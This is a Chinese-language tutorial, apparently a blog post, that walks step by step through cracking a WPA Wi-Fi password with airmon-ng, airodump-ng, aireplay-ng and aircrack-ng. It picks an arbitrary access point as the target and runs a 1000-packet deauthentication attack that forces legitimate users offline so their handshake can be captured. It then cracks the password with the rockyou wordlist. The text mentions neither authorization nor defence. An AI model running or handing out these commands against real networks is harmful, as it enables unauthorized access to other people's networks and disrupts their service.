用到的工具
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
过程
1 |
root@lm:~# ifconfig |
airmon-ng
我们看到没有mon0
接着下一条命令,开启监听模式
1 |
root@lm:~# airmon-ng start wlan0 |
红色字体mon0已经开启,这时候再次输入ifconfig,发现是不是有mon0了!
接下来开始探测AP
airodump-ng
airodump-ng mon0
1 |
CH 7 ][ Elapsed: 1 min ][ 2015-04-03 19:28 |
可以看到上方有很多BSSID也就是常说的MAC地址
我们选择一个BSSID进行攻击,抓包
1 |
airodump-ng -w 保存包的路径 -c 频道 -b BSSID mon0 (airodump-ng -w /root/Desktop/wifi -c 11 -b xx:xx:xx:xx:xx:xx mon0) |
airodump-ng 参数
1 |
aireplay-ng -0 次数 -a AP'MAC -c 客户端'MAC mon0 --ignore-negative-one (aireplay-ng -0 1000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0 --ignore-negative-one) |
对合法用户进行deauth攻击,使其掉线重新连接AP,那么我们就静静等待抓握手包
看到这个就说明,我们已经抓到他的握手包了
接下来就是跑包环节
aircrack-ng
1 |
aircrack-ng -w< 字典 握手包 [我的字典文件在/root/password/,握手包在主文件夹下那么,就这样写] aircrack-ng -w /root/password/rockyou.txt adminlm*.cap |
不要问我*是什么意思,你们应该懂! (*相当于模糊搜索)
在 Index number of target network ? 我们选择2,也就是我们抓到握手包的那个 回车键
密码跑出来了,123456789